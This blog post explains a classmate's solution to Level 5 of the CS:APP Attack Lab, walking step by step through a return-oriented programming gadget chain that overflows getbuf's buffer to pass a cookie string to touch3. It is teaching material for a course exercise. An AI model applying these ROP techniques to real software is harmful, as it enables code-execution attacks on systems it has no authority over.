Attack Lab - Level 5 explained

Ning Wang has published a very good write-up (2022 update: web page is gone now) on his solutions to the Attack Lab from the CS:APP book. However, I thought his solution to Level 5 could do with a bit more elaboration for those who are struggling with this topic.

First, it is necessary to understand what ROP requires. An essential component of ROP is good luck, lots of it. Without getting lucky, you may take more than 10100 years to find a workable attack, if at all. This, the authors of CS:APP did not mention. I also could not comprehend the purpose this exercise is even given out as homework in CMU to be completed in a week (while there are tons of homework from other courses too), without an intensive course in Intel Assembler as a prerequisite.

Level 5 requires the same general logic as Level 3, which can be summarized as (pseudo code):

mov <cookiestring address>, %rdi //why? because touch3 is expecting it there
call touch3


To achieve the above for Level 5, the next level of elaboration would be:
  1. Put your cookie string somewhere on the stack, and note its (relative) position.
  2. Craft code to:
    1. Save the value of the stack pointer, %rsp, and determine the offset of the cookie string address from this run-time value of %rsp.
    2. Add the offset to the saved value of %rsp
    3. Transfer this sum to the register %rdi.
    4. Jump to touch3.

With ROP, you then try your luck searching for code fragments to achieve Step 2 above. It would be sensible to start "bottom up", ie work first from the last instruction (the one just before RETQ to touch3).

ROP requires finding fragments (I don't know why the lab calls it gadgets) that suit your purpose. You are at the mercy of what lucky sequences of bytes in the target program (or machine) can do. Sometimes a fragment may contain additional code that you don't want or need, but this can be ignored if those instructions do not destroy any of your data.

In the simplest form, each code fragment has to contain a RETQ instruction somewhere in it. The RETQ instruction will pop the stack and jump to the popped value. By lining up the addresses of such code fragments (gadgets) adjacent to one after another on the stack, execution will then flow from one fragment (gadget) to the next, and the last one will pass control, in a similar manner, to the function touch3.

Looking at Ning's solution, after getbuf() is called and the longer than expected exploit string is entered, control is passed to the sixth line in his exploit string. Sixth because the first five lines (totaling 40 bytes) are the actual string expected for the variable buf (see page 3 of the lab handout). (For CMU students, BUFFER_SIZE is different so you have to adjust for this but adding or removing padding bytes.) The eight bytes on the sixth line (06 1a 40 00 00 00 00 00) obliterate the originally value on the stack, which previously contains the return address, ie the address of the line following the code that called getbuf(). These six bytes now point to the address of Gadget 1. The rest of the exploit string that follows also overwrites the stack, into the parent's stack frame - a dangerous stunt indeed.

The solution by Ning uses the following logic (view this side-by-side with his annotated exploit string):

Note that what is not shown in Ning's comments is that every gadget ends with a RETQ instruction (opcode C3).




  1. Gadget 1: saves %rsp to %rax. %rsp at this point is pointing to the the next "line" on the exploit string aka stack (annotated as Gadget 2).
  2. Gadget 2: saves %rax to %rdi. %rdi remains unchanged for rest of code. %rdi therefore points to the seventh "line" on the exploit string listing.
  3. Gadget 3: POPQ %rax moves the constant 0x00000040 (the value in the next "line" on the stack) into %rax. Why 6410? There are 64 bytes between the seventh line (where %rdi now points to) and the cookie string at the bottom of the listing. The address of the cookie string is thus %rsp+64, and the rest of the code basically jumps through hoops just to carry out this simple arithmetic operation.
  4. Gadget 3 continued: the next instruction in Gadget 3 swops %eax with %edx. We DO NOT NEED this operation, but this is in the selected code fragment and we have no choice but to go along with it. Note that %eax is a 32-bit register, so only the lower 32 bits of %rax are used. As our value contained in %rax is 64 (barely a byte), this has no impact.
  5. The POPQ instruction of Gadget 3 increments %rsp by 8 bytes - this is the nature of all POP instructions. The RETQ instruction in Gadget 3 carries out another POP operation, and thus %rsp is now pointing two "lines" down, at the address of Gadget 4.
  6. Gadget 4 and Gadget 5 are just making use of the (luckily) available code fragments to move that constant 64 into %rsi.
  7. Gadget 6: Perhaps there are no suitable ADD instructions in the "gadget factory", so the LEA instruction is used to add the required 64 (now in %rsi) to the saved value of %rsp (in %rdi from Gadget 2). LEA (%rdi, %rsi, 1), %rax performs something like add the contents of %rdi to %rsi multiplied by 1 into %rax. %rax now contains the address of the cookie string!
  8. Gadget 7: Moves %rax to %rdi, and the RETQ transfers control to touch3.

I hope you now have a better idea of how the Level 5 exploit works.

Comments

Popular posts from this blog

Assembly version, File version, Product version

Setting to English for the Xiaomi Wifi Router